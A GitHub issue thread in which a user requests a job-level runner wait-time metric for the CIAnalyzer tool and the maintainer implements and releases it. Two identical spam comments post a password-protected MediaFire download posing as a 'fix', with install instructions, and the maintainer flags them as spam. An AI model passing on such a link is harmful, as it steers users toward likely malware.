### ISSUE TITLE
Supports waitingRunnerElapsedSec 

### ISSUE THREAD

**Issue by paper2** [Kesin11/CIAnalyzer#1302]
Hi, @Kesin11 . I suggest to add [waitingRunnerElapsedSec](https://github.com/Kesin11/actions-timeline/blob/a935328e50b2b49bb4a1f184ab2a67f8dbf7733a/src/workflow_gantt.ts#L51).  I know it's hard, so feel free to reject it. 

## Backgraound

- We use [Managing large runners](https://docs.github.com/en/actions/using-github-hosted-runners/using-larger-runners/managing-larger-runners).
- Maximum concurrency is fixed to low number because bug of actions does not waste runners.
- Some jobs shares same runner group. 
- I want to measure waitingRunnerElapsedSec. If it is long, I want to fix it.

## Consideration

- If we support this feature, we expect it to be a major change as it will probably require support for other services and schema changes.
- If possible, I would be happy if github could support this as well.

Thanks.

**Comment by Kesin11** [comment]
@paper2 
CIAnalyzer already supports [queuedDurationSec](https://github.com/Kesin11/CIAnalyzer/blob/828f456ca91b4c792f0511414efdf58bf9a10472/src/analyzer/github_analyzer.ts#L39), which is equivalent to the waiting runner duration.

However, `queuedDurationSec` represents the waiting time for the workflow run in GitHub Actions, whereas actions-timeline's `waitingRunnerElapsedSec` represents the waiting time for a job. Are you requesting the implementation of the waiting time for a job?

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Kesin11** [comment]
It seems spam comment.
https://github.com/search?q=rickdoq&type=issues

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by paper2** [comment]
@Kesin11 

>Are you requesting the implementation of the waiting time for a job?

Yes!!

I think we can measure time of waiting for [Managing large runners](https://docs.github.com/en/actions/using-github-hosted-runners/using-larger-runners/managing-larger-runners) ready.

**Comment by Kesin11** [comment]
@paper2 
If it's only for GitHub Actions, implementing `waitingRunnerElapsedSec` for jobs is not so difficult. Recently, I am only interested in GitHub Actions, so it should be fine to put zero values for other CI services.

I'm going to try it today.

**Comment by Kesin11** [comment]
@paper2 
I just implemented and released new version 🚀 
https://github.com/Kesin11/CIAnalyzer/releases/tag/v6.1.0

**Comment by paper2** [comment]
@Kesin11 Thanks!! I will use it. If I success to improve our CI, I spread this OSS more☺️
